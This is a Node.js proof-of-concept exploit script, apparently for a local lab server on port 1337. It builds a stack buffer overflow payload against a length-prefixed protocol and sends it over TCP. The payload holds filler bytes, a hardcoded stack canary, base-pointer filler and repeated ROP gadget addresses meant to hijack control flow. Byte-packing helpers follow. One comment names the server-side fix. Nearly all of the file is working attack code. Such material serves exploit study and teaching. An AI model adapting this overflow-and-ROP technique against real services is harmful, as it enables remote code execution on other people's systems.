const net = require("net");
/*
The server accepts the following message format in bytes:
0 1 2 3 n
+----+----+----+-- ... --+
| ps | payload |
+----+----+----+-- ... --+
ps = payload size
The server doesn't validate incoming ps values. Besides, the
buffer which stores the message payload can only hold up to
32 bytes.
*/
// Proof-of-concept message for the bug described above: the payload
// built here is 80 bytes (32 + 8 + 8 + 8 + 8 + 8 + 8), far past the
// server's 32-byte receive buffer. The server-side fix is to reject
// any ps larger than the receive buffer before copying the payload.
// merge/string/hexLE are function declarations further down; they are
// hoisted, so calling them here is fine.
const evilPayload = merge(
string("A".repeat(32)), // fill the buffer
string("B".repeat(8)), // stack alignment
hexLE("0xea8cf540df1f0038"), // stack canary
//string("C".repeat(12 + 4)), // stack alignment and socketfd parameter
string("D".repeat(8)), // stack base pointer
hexLE("0x103572c61"), // ROP gadget #1
string("D".repeat(8)), // stack base pointer
hexLE("0x103572c61"), // ROP gadget #1
);
// ps is a single byte, so the payload must be at most 255 bytes long;
// byte() writes it with a plain index assignment, which would wrap
// silently for longer payloads.
const evilMessage = merge(byte(evilPayload.length), evilPayload);
const client = new net.Socket();
// Connect to the local test server, dump the raw bytes, send them,
// then tear the socket down without waiting for a reply.
client.connect(1337, "127.0.0.1", () => {
console.log(evilMessage);
client.write(evilMessage);
client.destroy();
});
// helpers
/**
 * Concatenate any number of Buffers into one new Buffer.
 * @param {...Buffer} parts - Buffers to join, in order.
 * @returns {Buffer} a fresh Buffer holding all parts back to back
 *   (empty when called with no arguments).
 */
function merge(...parts) {
  // The rest parameter is already an array, so it can be passed straight through.
  return Buffer.concat(parts);
}
/**
 * Encode a JavaScript string as a UTF-8 Buffer.
 * @param {string} str - text to encode.
 * @returns {Buffer} the UTF-8 bytes of str.
 */
function string(str) {
  // Buffer.from(string) defaults to utf8; spelled out here for clarity.
  const encoded = Buffer.from(str, "utf8");
  return encoded;
}
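/**
 * Pack a single unsigned byte into a 1-byte Buffer.
 *
 * The original wrote `buffer[0] = b`, which silently wraps values
 * outside 0..255 (e.g. 256 becomes 0) — a wrong length prefix would
 * go unnoticed. writeUInt8 throws instead.
 *
 * @param {number} b - value in the range 0..255.
 * @returns {Buffer} a 1-byte Buffer containing b.
 * @throws {RangeError} if b is outside 0..255.
 */
function byte(b) {
  const buffer = Buffer.alloc(1);
  // writeUInt8 range-checks its argument; a bare index assignment does not.
  buffer.writeUInt8(b, 0);
  return buffer;
}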
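/**
 * Encode an unsigned 64-bit value as 8 little-endian bytes.
 *
 * The parameter was previously named `string`, which shadowed the
 * sibling `string()` helper inside this function; it is renamed to
 * avoid that confusion (positional call sites are unaffected).
 *
 * @param {string|number|bigint} hex - value accepted by BigInt(), e.g. "0x1234".
 * @returns {Buffer} 8 bytes, least-significant byte first.
 * @throws {SyntaxError} if hex is a string BigInt() cannot parse.
 * @throws {RangeError} if the value is negative or exceeds 2^64 - 1.
 */
function hexLE(hex) {
  const buffer = Buffer.alloc(8);
  // writeBigUInt64LE range-checks the BigInt for us.
  buffer.writeBigUInt64LE(BigInt(hex), 0);
  return buffer;
}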
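/**
 * Encode an unsigned 64-bit value as 8 big-endian bytes.
 *
 * The parameter was previously named `string`, which shadowed the
 * sibling `string()` helper inside this function; it is renamed to
 * avoid that confusion (positional call sites are unaffected).
 *
 * @param {string|number|bigint} hex - value accepted by BigInt(), e.g. "0x1234".
 * @returns {Buffer} 8 bytes, most-significant byte first.
 * @throws {SyntaxError} if hex is a string BigInt() cannot parse.
 * @throws {RangeError} if the value is negative or exceeds 2^64 - 1.
 */
function hexBE(hex) {
  const buffer = Buffer.alloc(8);
  // writeBigUInt64BE range-checks the BigInt for us.
  buffer.writeBigUInt64BE(BigInt(hex), 0);
  return buffer;
}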